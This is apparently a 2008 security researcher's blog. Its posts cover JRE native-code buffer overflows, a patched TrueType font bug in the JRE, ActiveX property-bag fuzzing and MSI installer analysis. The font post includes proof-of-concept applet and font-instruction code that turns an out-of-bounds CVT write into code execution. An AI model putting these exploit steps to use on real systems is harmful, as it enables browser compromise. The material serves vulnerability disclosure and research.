Wednesday, 30 January 2008

Three Categories of Buffer Overflow in the JRE

Some people think that writing code in Java is a silver bullet against implementation flaws such as buffer overflows. The truth is a little murky. Certainly, there is no provision for overflows in pure Java code; reading or writing past the end of an array generates an exception, as the following toy code demonstrates:

public class overflow
public static void main(String args[])
char buf[] = new char[10];
String src = args[0];

for (int i = 0; i < src.length(); i++)
buf[i] = src.charAt(i);

System.out.println("buf is " + new String(buf));

C:\dev>java overflow foobar1234
buf is foobar1234

C:\dev>java overflow foobar12345
Exception in thread "main" java.lang.ArrayIndexOutOfBoundsException: 10
at overflow.main(

But real code, though it might be written in 100% Java, depends heavily on the Runtime Environment (JRE) and the JRE contains methods that are written in straight C. We all know what happens when C hangs out with its buddies: fixed size buffer, strcpy and user input.

So how do you even start to assess the attack surface of the JRE? Perhaps I'll go into this in more detail in a future post if anyone is interested, but briefly for now, if we discard logical flaws in the JRE that let you escape the sandbox (as attempting to measure exposure to these is really hard) and concentrate solely on the native code parts, we can:

  • Determine the amount of native code within the JRE:

    • Download the Java source code and search for the JNIEXPORT and JNICALL macros to detect native methods, e.g.:


      JNIEXPORT jboolean JNICALL
      Java_sun_awt_image_GifImageDecoder_parseImage(JNIEnv *env,
      jobject this,
      jint relx, jint rely,
      jint width, jint height,
      jint interlace,
      jint initCodeSize,
      jbyteArray blockh,
      jbyteArray raslineh,
      jobject cmh)

    • Or alternatively dump the exports of the DLLs within the JRE bin directory, e.g.:

      C:\dev> dumpbin /exports jpeg.dll | findstr /c:"_Java_"


    • Or enumerate all methods of all classes in the runtime and count up those marked as native. This can be done in a few lines of code using the Byte Code Engineering Library (BCEL), a great project for low level manipulation and construction of classes.

  • With a list of the native methods, perform some static analysis to score each method - how much code does it contain (including all the code within all function calls), does it process data that might be untrusted and so on.

  • Now trace or perform static analysis on your application - your applet, servlet etc. - to determine which methods you touch.

But I digress. The main point of this post is to highlight three categories of buffer overflow that exist within the JRE, so here they are:

  1. Buffer overflows in file format parsers

    Much of the JRE file format parsing code is implemented in native code, typically either for speed or because the code originated elsewhere. This includes BMP, GIF, JPEG, ICC, TTF and Soundbank parsing, and a few I've probably forgotten.

    Incidentally I was first alerted to this when a Java application I was running (it happened to be Burp Proxy, seriously!) started crashing, leaving the familiar hs_err.log file behind. The log showed that I was triggering an access violation in fontmanager.dll, which I tracked down to a corrupted TrueType font I had in my fonts folder (TrueType fonts are hard things to parse - there's a mixture of 16 and 32 bit fields, lengths, offsets and to cap it all, provision for a virtual machine, as you'll already know if you read my last post!).

    Chris Evans did some great write ups on the bugs he found in the JRE image parsers here and here.

  2. Buffer overflows in the platform API wrapper code

    In addition to file format parsers, methods that interact with the OS are also ultimately implemented in native code as they need to call the appropriate platform API. These methods typically need to convert Java datatypes such as a String into a C datatype, such as a wide character array. Sound like a potentially hazardous operation? Well my colleagues at NGS, Wade Alcorn ("The King of BeEf") and Marcus Pinto (of Web Application Hacker's Handbook fame) found such a bug in BEA's JRockit JVM. The NGS advisory is here. This issue could be triggered remotely as an unauthenticated user against WebLogic Server by requesting a long URL (!) which triggered an overflow as the path was canonicalised.

  3. Buffer overflows in the underlying platform APIs

    The previous category comes about from insecurely preprocessing data before handing it off to a platform API. Let's consider the opposite - doing no processing and exposing a bug in a platform API. A notable example of this category is a critical vulnerability discovered by Peter Winter-Smith, another colleague of mine at NGS. He found an overflow that could be triggered by passing a string of 65536 bytes to gethostbyname, exported by ws2_32.dll. This issue was fixed in MS06-041 (NGS advisory here). It was trivial to generate Java code to hit this bug.

    Now you may be thinking that it isn't really fair to call this a Java problem as it is clearly an OS/third party library bug. Perhaps it isn't fair :) It is interesting though that in some areas of the JRE, the layer on top of the platform APIs is so thin that these types of bug are exposed (I think Peter actually found the gethostbyname bug while testing a Java application!) Also note that this further complicates attack surface analysis :(

A final note on how these affect different types of Java application. The example I gave in (2), is a clear example of buffer overflow in the Java runtime that can be used to compromise a server. The examples in (1) and (3) less so. Its feasible that a Java Enterprise application may parse a file uploaded by a user but it obviously depends on the purpose of servlet. On the other hand, a malicious applet that attempts to exploit the browser through a file format bug in the JRE is certainly conceivable.

And as for mobile Java, their runtime implementations do not typically share the native code components with the desktop JRE so the chances of there being an all conquering cross-device cross-architecture cross-Java implementation vulnerability are pretty slim (despite news to the contrary), though I'll stop short of saying impossible :)



Thursday, 24 January 2008

A Cross-browser, Cross-platform, Cross-architecture Bug in the JRE


In October 2007 I released an advisory in Sun's Java Runtime Environment versions 1.5.0_09 and below (NGS link here, SunSolve here). The bug in question allowed an attacker to craft a malicious TrueType font that could execute arbitrary native code when processed by a Java applet, thus compromising the browser. I gave partial details in the original advisory but have decided to discuss it in a bit more detail here.

What makes TrueType fonts more interesting than a run-of-the-mill file format is that they contain code. Surprising as it may seem, TrueType fonts can contain instructions for a virtual machine. Wikipedia has a good summary:

TrueType systems include a virtual machine that executes programs inside the font, processing the "hints" of the glyphs. These distort the control points which define the outline, with the intention that the rasterizer produces fewer undesirable features on the glyph. Each glyph's hinting program takes account of the size (in pixels) that the glyph is being displayed at, as well as other less important factors of the display environment.

Although incapable of receiving input and producing output as normally understood in programming, the TrueType hinting language does offer the other prerequisites of programming languages: conditional branching (IF statements), looping an arbitrary number of times (FOR- and WHILE-type statements), variables (although these are simply numbered slots in an area of memory reserved by the font), and encapsulation of code into functions. Special instructions called "delta hints" are the lowest level control, moving a control point at just one pixel size.

So to the flaw in the JRE. Firstly I should state that the TTF parsing code and the virtual machine were written in C (not Java) and exposed via JNI. This means we are into the realms of common implementation flaws - buffer overflows, integer overflows and the like.

The VM implements two instructions for writing values to the Control Value Table (CVT). The CVT holds global variables that can be used by multiple glyphs - its basically a global data store. One of instructions for writing to the CVT did not verify that the supplied index lay within the bounds of the CVT. This allows us to write a scaled value relative to the base of the CVT. Through experimentation (though this is probably documented somewhere) I determined that the scaling factor is based on the requested size of the font - setting this to 32 results in a factor of 1.

Since the CVT is dynamically allocated we don't quite have an arbitrary write to an arbitrary location yet. We must first determine where the CVT is located. Fortunately the instruction to read from the CVT also doesn't valid its index so we can read memory relative to the CVT. Again from experimentation I determined that at 0x38 DWORDs prior to the CVT (i.e. a negative offset) there is a pointer that points to the end of CVT. Given that we know the size of the CVT we can determine the base of the CVT and therefore write an arbitrary value to an arbitrary location.

The nice thing about this bug is that we can repeatedly call the write primitive above which means there are countless ways to exploit it. I chose to overwrite a function pointer for one of the virtual instructions, then call this instruction. The value I overwrite the function pointer with (i.e. the address of my payload) is the address of the CVT itself. What about DEP? Java and DEP don't get along so the chances are, if the user has used the Java plugin before, DEP will be disabled. This means we can execute our payload straight from the heap.

Here's what you'll need to write a PoC:

  1. First, the easy bit, a Java applet to load the font. For convenience sake we can package the font with the applet inside a JAR file. The alternative is that we load the font from a web server (subject to the same origin policy, of course) or that we put it inside our class file as an array of bytes, accessed via a ByteArrayInputStream. To trigger loading of the bug and execution of our TTF instructions we simple CreateFont, set it to the appropriate size and render some text:

    InputStream is = this.getClass().getResourceAsStream("exploit_font.ttf");
    Font font = Font.createFont(Font.TRUETYPE_FONT, is);
    font = font.deriveFont(32.0f);
    Graphics g = this.getGraphics();
    g.drawString("This will trigger the bug", 20, 20);

  2. Next on to the font itself. Documentation on the TrueType instruction set may be found here. To construct the font I used the TTIComp TrueType instruction compiler. TTIComp takes as input a TTI file (containing our functions) and a TTF file. It produces a new TTF containing our compiled functions. TTIComp comes with some examples and a great tutorial for getting started.

  3. And finally the TTI itself. It looks something like this:

    #input "original_font.ttf"
    #output "exploit_font.ttf"

    #cvt cvt0: 0

    // This is our definition of the preparation
    // function
    // This will get called repeatedly when rendering
    // text in this font

    void prep()
    // Function 0x89 is getInformation
    int iFn = 0x89;

    // Address of function pointer table for
    // JRE 1.5.0_07
    int iFnPtrTable = 0x6D27BB00;

    // End of CVT
    int iEndCVT = int(getCVT(uint(-0x38)));

    // Location we need to overwrite
    int iLocation = iFnPtrTable + int((fixed(iFn) * 4.0));

    // Fill CVT with our payload (some int 3's)
    setCVT(uint(0), 0xCCCCCCCC);

    // Perform overwrite
    // We substract 4 from iEndCVT to get the address
    // the start of the CVT (i.e. the address of our
    // payload)
    setCVT(uint(fixed(fixed((iLocation - iEndCVT)) / 4.0)), iEndCVT - 0x4);

    // Trigger payload by calling getInformation

You'll note that I use a hardcoded address for the table of instruction pointers. I'm lazy, sue me. I suspect the base address of fontmanager.dll, the DLL containing the font parsing code, doesn't move across versions of the JRE so you could scan for the table fairly easily.

And our payload of int3's isn't very interesting. Ideally our stager payload should allocate some memory, copy our second stage payload into it and kick off a new thread from this address. This ensures that the Java plugin/font manager code can keep running as normal (we don't want to be executing code from the CVT when the font's resources are freed).

Finally, what makes bugs in the Java plugin so dangerous is that most of them can be exploited cross-browser, cross-platform, cross-architecture. To write an exploit capable of this, create TTFs as above but with payloads specific to a particular scenario (OS) and add some logic to determine which font to render. An unsigned applet can access properties such as and os.architecture to assist in this.

That wraps up discussion of this bug. I'll be posting more on specific Java plugin issues in the coming months and I have a post in the pipeline that debunks the most common Java security misconceptions so keep an eye out for that.



Thursday, 17 January 2008

Fuzzing ActiveX? Don't Forget The Property Bags

(Note: I have a back log of posts so I'll be posting a fair amount over the next month)

There are several tools out there to fuzz ActiveX controls. COMRaider is one such tool, which is a useful addition to any bug hunter's toolkit. I am going to discuss a limitation that you should be aware of if you are testing ActiveX controls, namely that it doesn't fuzz property bags.

I was going to start by reproducing the definition of the OBJECT tag from the HTML DTD but its pretty big, so here's an example instead:

<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
codebase=",0,40,0" width="300" height="120">
<param name="movie" value="flash.swf">
<param name="quality" value="high">
<param name="bgcolor" value="#FFFFFF">

In order to investigate the methods and get/set-able properties of a particular ActiveX control such as the Shockwave plugin, we can fire up the Microsoft OLE/COM Object Viewer (oleview), or programmatically create the object and ask it what it does through the IDispatch interface.

But methods and properties are not the only way we can interact with ActiveX controls. What about the name value pairs supplied via the PARAM tag above (movie, quality and bgcolor)? What other parameters might our target control accept, and how do we determine these? Well we have three options:

  1. Search for web pages that instantiate the control and note the parameters they pass (or the control's documentation in the case of a control like Shockwave). This approach is fine for obtaining the normal use parameters, but what if the control has interesting debug parameters that are undocumented?

  2. Run "strings" over the binary and treat each character string as the name of a parameter. This approach is viable but depending on the number of strings returned, may result in an unrealistic amount of test cases.

  3. Implement the required ActiveX container interfaces and let the control tell us what parameters it will accept. Clearly an optimal approach, this is what we shall focus on.

The parameter mechanism is implemented by the IPropertyBag interface in the container (i.e. Internet Explorer, your fuzzer, TstCon) and the IPersistPropertyBag interface in the control itself. There are also enhanced versions of these interfaces, IPropertyBag2 and IPersistPropertyBag2 though most controls I've seen don't use these (in fact the QuickTime plugin is one of the only controls I've seen with an IPersistPropertyBag2).

So in order to enumerate a control's parameters, also we have to do is implement IPropertyBag. This is actually pretty simple, since the interface only exposes two methods:

ReadTells the property bag to read the named property into a caller-initialized VARIANT.
WriteTells the property bag to save the named property in a caller-initialized VARIANT.

Time for an example. A while back when first looking into property bags I discovered a bug in the version of Yahoo! Messenger I happened to have installed. As it turned out, I had an outdated version and newer versions had fixed the issue, which had been reported to Yahoo! by iDefense.

There was a heap overflow in ymmapi.dll within the safe-for-scripting ymmapi.ymailattach.1 component. The vulnerable version of the control is still hosted on here in a signed CAB file, though I warned them of this in November '06. The idea of flawed but signed code floating around the Internet is a scary one though the logistics of dealing with this are more of a Microsoft ActiveX design problem which I will discuss another time.

Back to the example in hand. Let's see how we can programmatically enumerate the supported parameters, pass a long string to each of them, locate the overflow and generate some equivalent HTML. I'm not going to give you the actual code (where's the fun in that?) but here's the set of steps required:

1. Initialise COM via CoInitialize.

2. Convert the supplied ProgID into a CLSID via CLSIDFromProgID if you don't already have it.

3. Create an instance of the ActiveX control via CoCreateInstance.

4. Call QueryInterface to request the IPersistPropertyBag interface.

5. Call the Load method of this interface passing it a pointer to our IPropertyBag implementation. Implementing a rudimentary IPropertyBag is simple - if you're happy to break the rules of COM for a simple PoC just implement stubs for QueryInterface, AddRef, Release and Write (obviously not recommended if you want to write anything more than a PoC). The only method that actually needs to do anything is Read.

6. The Read method of our IPropertyBag will be called each time the control requests the value of a specific parameter. We must reply with a VARIANT of type BSTR. Supply an empty string if you just want to enumerate the parameters or return your fuzz string. Once we trigger heap corruption, our process will AV so its best to run it in a debugger (and enable page heap with gflags).

If you go through the above steps and run your code on the ymmapi.ymailattach.1 control (having registered the control with regsvr32 first if you downloaded the CAB), you should find it breaks soon after receiving a long string in response to the Read for the "TextETACalculating" property.

Generating an HTML test case to reproduce this is easy - use JavaScript to dynamically create an OBJECT tag and the following function to build a string of suitable length (which I borrow from here):

String.prototype.repeat = function(l)
return new Array(l+1).join(this);

var fuzzstring = "a".repeat(50000);>

Giving you something like this when you load it into IE and your debugger kicks in:

The obligatory OllyDbg shot

So that's it for now. I'll be posting more on ActiveX in future posts. I want to cover killbits, ActiveX design limitations, and how to detect and handle sitelocking when fuzzing.



Wednesday, 16 January 2008

Hunting Bugs Pre-Installation

There are many things that can be automated in security testing, with the goal of freeing up time to perform manual analysis of interesting areas (or for pub lunches or playing pool etc.) Fuzzing is a great example of this - you leave the fuzzer crunching away while you review the source code or disassembly.

But fuzzing is just part of the work that needs to be done. If I have some downtime between consultancy gigs and I decide to do some bug hunting, I have to first choose a product that I think will have some interesting components, then I have to install it, then I have to do a quick informal analysis of its attack surface, then I have to attack it. I have been thinking for a while about how we can automate these other areas:

  1. Target selection. This really depends on what sort of technologies you are interested in testing, e.g. if I've created a new file format fuzzer, I'll want to test it out on some client side apps. Similarly, if I'm looking researching RPC, I'd favour server side apps. We can therefore choose a target by ranking various technologies and performing some pre-installation analysis of the product - does it install a system service? Does it install a driver? Does it register a protocol handler? And so on (there are many, many more we could use).

  2. Installation. This is normally easy to script - we can fire up a clean VM and silently install our target app into it. Depending on the app, we might have to configure some settings manually, and we probably want to be running standard tools such as Filemon/Regmon/Procmon so we know exactly what is installed.

  3. Testing. If we knew in advance or at least at runtime, what technologies the application installed we could set up specific fuzzers, e.g. if we know it registers handlers for certain filetypes we might automate retrieving some sample files from our zoo of interesting test cases, or if its an unknown filetype to us, from Google.

Further thinking on the above lead me to consider what types of vulnerability can we easily spot without even installing the product - i.e. just from an analysis of the install files. I say "easily" spot, since you could argue that we could just perform static analysis of the application binaries to find bugs with no need for any dynamic analysis! I am interested in looking for specific issues or classes of issue that can be spotted from simple analysis of the install files. I will leave the discussion of installation time issues (such as this) for another day.

Installers for enterprise level software typically use Windows Installer or InstallShield. Much of the discussion that follows is focused on MSIs, the file format of the Windows Installer. An MSI file is essentially a database inside a structured storage document. The database holds information about what needs to be done - which keys need to be put in the registry, which files need to be unpacked and where, which drivers need to be installed and so on. The MSI API provided within the platform SDK has functions for creating, opening, querying and updating databases. The query language is SQL. Perhaps the easiest way of investigating an MSI is with Orca (if you view an MSI with a structured storage viewer such as SSView, the stream names will appear corrupt, although you will no doubt recognise some of the content of the streams themselves as CAB files - more on this later).

Orca a command line and GUI-based tool for viewing and modifying MSI table data. It is included with the Windows SDK Components for Windows Installer Developers but can be found elsewhere if you don't feel like downloading 300mb to get it :)

Orca, examining the File table

Let's take a quick look at one of the interesting tables. The rest of them are documented here.

  • LockPermissions - The LockPermissions table deals with ACLs. MSDN states "it can be used to secure individual portions of an application in a locked-down environment. It can be used with the installation of files, registry keys, and created folders." However note that it can be used to set any required ACLs on a resources - i.e. it can be used to set a weak ACL on a shared resource, and used incorrectly, can introduce vulnerabilities.

Now lets look at a real world example. In August 2007 Dominic Beecher, a colleague of mine at NGS, released a privilege escalation advisory in the Cisco VPN client. Versions prior to set an ACE that allowed interactive users to modify files in the installation directory, easily detectable from cacls.exe or accesschk.exe:

C\Program Files>accesschk -d -s -w "NT AUTHORITY\INTERACTIVE" .

AccessChk v2.0 - Check account access of files, registry keys or servicesCopyright (C) 2006 Mark Russinovich Sysinternals -

RW C:\Program Files\Cisco Systems\VPN Client\
RW C:\Program Files\Cisco Systems\VPN Client\accessible\
RW C:\Program Files\Cisco Systems\VPN Client\Help\
RW C:\Program Files\Cisco Systems\VPN Client\include\
RW C:\Program Files\Cisco Systems\VPN Client\Languages\
RW C:\Program Files\Cisco Systems\VPN Client\Resources\
RW C:\Program Files\Cisco Systems\VPN Client\search\
RW C:\Program Files\Cisco Systems\VPN Client\Setup\
RW C:\Program Files\Cisco Systems\VPN Client\shared\

Based on our discussion of the LockPermissions table above, you might expect to see a entry in this table for the installation directory, but if you open up a vulnerable version of the client MSI (e.g. vpnclient-win-msi- in Orca, you won't find one. How does the installer set this ACE? Before we solve this, lets consider the InstallShield way of doing things.

InstallShield stores installation data in script files which have the extension INS prior to version 6, and INX post v6. There are many tools to decompile these files; the two most widespread seem to be isDcc and Sid. I was browsing some sample InstallShield code here and noticed two samples for setting ACLs. The first builds an ACL then calls the standard Win32 API, SetNamedSecurityInfo. This is a lot of work compared to the second solution, which simply calls cacls.exe to do the heavy lifting. With this in mind, lets see how the InstallShield version of a vulnerable Cisco VPN client does things (vpnclient-win-is-

@0000D71F:0006 local_string2 = local_string1;
@0000D729:0021 LongPathToQuote(local_string2, 1);
@0000D737:0007 local_string2 = (local_string2 + " /t /e /g \"NT AUTHORITY\\INTERACTIVE\":C");
@0000D76A:0021 function_264("cacls.exe", local_string2, -1);

If you trace this fragment back a little in the decompiled script you'll find it assigns the installation directory to a global string and calls a function that executes this code.

So back to the MSI, now we have a big clue. Could it be that this particular MSI also calls cacls.exe? Searching in Orca for cacls.exe proves this is the case. The CustomAction table contains the entry:

CsCaExe_SetVpnClientFolderACL 3170 SystemFolder cacls.exe "[INSTALLDIR]." /t /e /g "NT AUTHORITY\INTERACTIVE":C

et voilĂ . The MSI API is very simple to use, so its easy to knock up a tool that scans for interesting LockPermissions entries and scans CustomAction for any exes that are launched, paying particular attention to cacls.exe entries.

There are several other vulnerabilities we can potentially detect prior to installation:

  • Service password if hardcoded. Interestingly, the ServiceInstall table has a password column, from MSDN:

    "This string is the password to the account name specified in the StartName column. Note that the user must have permissions to log on as a service. The service has no password if StartName is null or an empty string. The Startname of LocalSystem is null, and therefore the password in this instance is null, so most services leave this column blank."

  • Outdated, vulnerable versions of common libraries such as Zlib, OpenSSL, LibCurl and so on.

    A note on extracting files from MSIs - if all you want to do is check the file version, it may not be necessary to extract it - check the Version field of the File table first. If you do need to extract the file, there are many tools out there that can do this. The basic premise is to look up the target file's Sequence in the File table then cross-reference this with LastSequence column in the Media table to get the CAB file name. If the CAB file name starts with '#' then this indicates it's stored as a stream inside the MSI (remember its a structured storage document). The last thing to add is that if you go looking for a stream name corresponding to the CAB name, you'll be out of luck. The stream name is an encoded version of the CAB name. My advice for anyone intending roll their own file extraction code is to take a look at the Wine MSI implementation first, this will hopefully save you some time.

Of course, once you get into performing static analysis of the application binaries themselves there are many more issues you can alert on reasonably easily such as service binaries with RPC interfaces without security callbacks, drivers with calls to IoCreateDeviceSecure with permissive SDDL strings and so on. These could form the basis of a nifty attack surface analysis tool... which I have done some initial work on. If anyone is interested in taking this further, or has additional vulnerabilities we can spot pre-installation, get in touch.



Hello World

So I'm blogging! This momentous event was largely brought about by the huge amount of travelling I did in December. What made these trips different to ones gone by, is that I had a new laptop with me that has a battery that can actually last longer than the time it takes to boot Vista (good job I was flying back and forth across the Atlantic or Sidebar might never have finished loading).

Anyway, this blog will be 90% security related and will cover what I'm thinking, researching and presenting. My first few posts are going to be quite long. After that, its depends on time and enthusiasm.

Feel free to drop me a line if you're interested in anything I write about.